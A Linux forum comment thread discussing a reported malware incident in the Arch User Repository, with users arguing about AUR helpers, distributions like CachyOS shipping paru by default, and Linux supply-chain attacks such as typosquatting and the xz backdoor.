this post was submitted on 14 Jun 2026
129 points (98.5% liked)
Linux
14056 readers
133 users here now
A community for everything relating to the GNU/Linux operating system (except the memes!)
Also, check out:
Original icon base courtesy of lewing@isc.tamu.edu and The GIMP
founded 3 years ago
MODERATORS
you are viewing a single comment's thread
view the rest of the comments
view the rest of the comments
Honestly I take no issue with the malware attack. I find it more offensive that many publications write it like it's the end of Arch. Like bro, AUR is NOT what I'd recommend to beginners to get their packages from. Some of the obscure packages include browser extension. Like, why would you install an extension from the AUR instead of the browser extension marketplace? This is why easy and braindead AUR helpers need to die. It encourages bad practice
CachyOS, which is one of the fastest growing distros and gets haphazardly recommended to tons of gaming refugees, ships with paru by default. Millions of forums, search results and LLM outputs encourage those same users to install stuff from AUR.
Any arch distro that has a sizeable non technical user base should know better than to ship or encourage using AUR. Shit like this is how we kill the “Year of the Linux desktop”.
This is exactly how we make the year of linux happen. For an alternative OS to enter mainstream it needs to be at the level os windows, so should have lots of malware around.
The problem is the delivery mechanism. Malware is quite rare in linux because we trust the maintainers. Unlike in windows where you're normalized to download executable off of the internet
Edit: What I meant is that notice almost always all of the attack on linux is supply chain based and not direct malware download. Be it via typosquat, package manager repository hijacking, or even long game like xz